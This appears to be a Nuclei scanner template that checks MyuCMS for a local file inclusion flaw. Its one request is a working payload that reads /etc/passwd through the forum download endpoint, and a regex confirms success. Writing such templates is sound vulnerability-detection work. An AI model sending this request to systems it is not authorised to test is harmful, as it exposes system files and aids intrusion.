29 lines
800 B
YAML
29 lines
800 B
YAML
id: myucms-lfr
|
|
|
|
info:
|
|
name: MyuCMS - Local File Inclusion
|
|
author: princechaddha
|
|
severity: high
|
|
description: MyuCMS is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://blog.csdn.net/yalecaltech/article/details/104908257
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 1
|
|
tags: myucms,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1"
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
# digest: 490a0046304402205638efd6e3ab9f6927e36ac539eb3ad4a391704e21c4a104fdb6e93f904868a302202158a08b652876505928dff8a7edccac1a3c41d07ed5dcda40f55e4f5c02adc0:922c64590222798bb761d5b6d8e72950
|